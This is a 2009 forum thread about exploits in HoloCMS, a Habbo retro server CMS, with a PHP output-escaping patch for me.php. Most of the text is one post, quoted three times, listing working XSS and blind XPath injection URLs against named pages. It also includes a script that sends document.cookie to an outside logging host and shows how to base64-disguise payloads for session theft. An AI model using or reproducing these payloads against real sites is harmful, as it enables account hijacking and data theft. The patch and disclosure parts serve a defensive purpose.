HoloCMS me.php redirecting exploit fix

**NitroHabbz** · 27-02-09

Ricky, Filtering metacharacters from user input would fix most of them...

**imadj** · 27-02-09

lol Zorex has nothing to do with it...

Hebbo found this 1 year ago, so, lol

and to found this was easy as 123...

so dont talk crap! (And there were other exploits in the cms (the cms is a piece of crap, lol, becaus this i release HoloTracker))

heres a Patched XSS injection:

http://ragehotel.game-server.cc/grou...B%3C/ScRiPt%3E

just try it :-)

**NitroHabbz** · 27-02-09

Originally Posted by imadj

lol Zorex has nothing to do with it...

Hebbo found this 1 year ago, so, lol

and to found this was easy as 123...

so dont talk crap! (And there were other exploits in the cms (the cms is a piece of crap, lol, becaus this i release HoloTracker))

heres a Patched XSS injection:

http://ragehotel.game-server.cc/group_forum.php?searchString=--%3E%3CScRiPt%20%0A%0D%3Ealert(XSS)%3B%3C/ScRiPt%3E

just try it :-)

Yeah... well wanna explain why my hotel seems to get redirected to "ragehotel.game-server.cc"

If hebbo was doing it... surely he'd redirect it to his crappy v30

anyway back ontopic.

Seems that "whoever" is doing it is injecting a meta refresh into config.php and other various files.

Working on a fix

**imadj** · 27-02-09

hebbo want it,

only Hebbo, Am and me have found this...

ahh btw, the thingy with redirection etc, there various server sql injections, i can inject a php file where i can edit everything form the server...

Holo is unsafe to use.

**Erlend** · 27-02-09

nice fix :D this pawns them.

**TomSpit** · 27-02-09

Originally Posted by NitroHabbz

Yeah... well wanna explain why my hotel seems to get redirected to "ragehotel.game-server.cc"

If hebbo was doing it... surely he'd redirect it to his crappy v30

anyway back ontopic.

Seems that "whoever" is doing it is injecting a meta refresh into config.php and other various files.

Working on a fix

Great, thanks for this ;)

**thijmen** · 27-02-09

Originally Posted by rickymenier

more???

The main exploits that I found are as follows:

/group_forum.php XSS vulnerability under the POST variable.

Code:

http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>

This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

Another possible exploit in group_forum.php:

Code:

http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>

This can be used to RFI any Javascript source that you wish, this can be anything that can be done with Javascript, including a JS shell.

Code:

http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:

Code:

var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;

Would be easier to do that with the xss.js RFI exploit.

/group_profile.php XSS exploits:

Like the Previous exploits, these ones are just simple Javascript injections.

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

/index.php XSS exploits:

Code:

http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on

Can be used to craft a custom cookie.

Code:

http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on

/tags.php XSS exploits:

This time on the GET variable. Same principle as the above exploits though.

Code:

http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

/index.php Blind XPath Injection Exploits.

This exploit is the most damaging. I can be used to drop the entire users database or extract any part that you wish.

Vulnerable variables are registerCancel and username.

Code:

http://site.com/index.php?registerCancel=true'+and+31337-31337='0

Code:

http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add

I will not advance on these exploits, if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

How a hacker can hide these vulnerabilities from you:

Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

Take this bit of the code:

HTML :

Code:

<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#

Base64 encoded will be the following:

Code:

PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

And simply replace that with added parametres so that the server knows that it is Base64:

Code:

http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.

Nice stolen.
Give credits to the one who needs it next time.

Also.
With a few .htaccess things, like MentaL stated, should be better.

**qwertynoob** · 28-02-09

How to patch those injections?

**NitroHabbz** · 28-02-09

Thijmen

it wasn't a stolen fix.... :s

**Mr. Oni** · 16-04-09

Originally Posted by rickymenier

more???

The main exploits that I found are as follows:

/group_forum.php XSS vulnerability under the POST variable.

Code:

http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>

This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

Another possible exploit in group_forum.php:

Code:

http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>

This can be used to RFI any Javascript source that you wish, this can be anything that can be done with Javascript, including a JS shell.

Code:

http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:

Code:

var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;

Would be easier to do that with the xss.js RFI exploit.

/group_profile.php XSS exploits:

Like the Previous exploits, these ones are just simple Javascript injections.

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

/index.php XSS exploits:

Code:

http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on

Can be used to craft a custom cookie.

Code:

http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on

/tags.php XSS exploits:

This time on the GET variable. Same principle as the above exploits though.

Code:

http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

/index.php Blind XPath Injection Exploits.

This exploit is the most damaging. I can be used to drop the entire users database or extract any part that you wish.

Vulnerable variables are registerCancel and username.

Code:

http://site.com/index.php?registerCancel=true'+and+31337-31337='0

Code:

http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add

I will not advance on these exploits, if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

How a hacker can hide these vulnerabilities from you:

Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

Take this bit of the code:

HTML :

Code:

<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#

Base64 encoded will be the following:

Code:

PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

And simply replace that with added parametres so that the server knows that it is Base64:

Code:

http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.

Stop leeching. I found these exploits about 3 months ago and they were all fixed. This is the exact same post that I made on numerous forums. Please stop claiming this as your own and stop your fail

**Mark1994123** · 16-04-09

Where can I add all these exploits?

Mark

**!Kevin!** · 16-04-09

Well almost anywhere in the .php file.I rather put them close to the biggening so less messy coding.

**Mark1994123** · 16-04-09

I Dont understand where I must paste all these exploits! Can someone explain it to me! or can someone the righ .php files include these exploits?

Mark

**yifan_lu** · 16-04-09

Originally Posted by NitroHabbz

This fix was done by cecer1, so all credits to him for this

simply replace the top code snippet with the bottom on me.php

This will stop people from redirecting your me.php to porn sites or to their own hotels :)

PHP Code:


printf("<li class=\"%s room-occupancy-%s\" roomid=\"%s\">
<div title=\"Go to the room where this event is held\">
    <span class=\"event-name\"><a href=\"./client.php?forwardId=2&amp;roomId=%s\" onclick=\"HabboClient.roomForward(this, '%s', 'private'); return false;\">%s</a></span>
    <span class=\"event-owner\"> by <a href=\"/user_profile.php?id=%s\">%s</a></span>
    <p>%s (<span class=\"event-date\">%s</span>)</p>
</div>
</li>", $even, $room_fill, $row['roomid'], $row['roomid'], $row['roomid'], htmlspecialchars($row['name']), $row['userid'], $userrow['name'], $row['description'], $row['date']);




printf("<li class=\"%s room-occupancy-%s\" roomid=\"%s\">
<div title=\"Go to the room where this event is held\">
    <span class=\"event-name\"><a href=\"./client.php?forwardId=2&amp;roomId=%s\" onclick=\"HabboClient.roomForward(this, '%s', 'private'); return false;\">%s</a></span>
    <span class=\"event-owner\"> by <a href=\"/user_profile.php?id=%s\">%s</a></span>
    <p>%s (<span class=\"event-date\">%s</span>)</p>
</div>
</li>", $even, $room_fill, $row['roomid'], $row['roomid'], $row['roomid'], htmlspecialchars($row['name']), $row['userid'], htmlspecialchars($userrow['name']), htmlspecialchars($row['description']), $row['date']);

Yea, I found this when I was recoding me. This was entirely my fault, as I was coding the events thing quickly, so sorry to anyone who got exploited. Also, instead of htmlspecialchars, I would use HoloText() as I wrote that function to be extendable. HoloText() will filter text that is to be displayed (stripslashes, htmlspecialchar, etc) and FilterText() will filter text that is to be inserted into the DB (mysql_real_escape). The great thing about using those functions is if another exploit is found somehow, instead of adding code to every place where user can input, you only have to do so in one place.

Originally Posted by rickymenier

more???

The main exploits that I found are as follows:

/group_forum.php XSS vulnerability under the POST variable.

Code:

http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>

This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

Another possible exploit in group_forum.php:

Code:

http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>

This can be used to RFI any Javascript source that you wish, this can be anything that can be done with Javascript, including a JS shell.

Code:

http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:

Code:

var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;

Would be easier to do that with the xss.js RFI exploit.

/group_profile.php XSS exploits:

Like the Previous exploits, these ones are just simple Javascript injections.

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

/index.php XSS exploits:

Code:

http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on

Can be used to craft a custom cookie.

Code:

http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on

/tags.php XSS exploits:

This time on the GET variable. Same principle as the above exploits though.

Code:

http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>

/index.php Blind XPath Injection Exploits.

This exploit is the most damaging. I can be used to drop the entire users database or extract any part that you wish.

Vulnerable variables are registerCancel and username.

Code:

http://site.com/index.php?registerCancel=true'+and+31337-31337='0

Code:

http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add

I will not advance on these exploits, if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

How a hacker can hide these vulnerabilities from you:

Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:

Code:

http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>

Take this bit of the code:

HTML :

Code:

<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#

Base64 encoded will be the following:

Code:

PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

And simply replace that with added parametres so that the server knows that it is Base64:

Code:

http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+

Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.

I'm pretty sure I fixed all these in the new HoloCMS (I filter out all use input-able text now), so check back in a few months when the release is out.

**Mr. Oni** · 16-04-09

TBH you're a moron if you chmod your files so that they are writeable. You deserve to be hacked

**tekriacorp** · 17-04-09

to tell truth anyone could do this without help

HoloCMS me.php redirecting exploit fix

Thread Tools

Search Thread

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Re: HoloCMS me.php redirecting exploit fix

Advertisement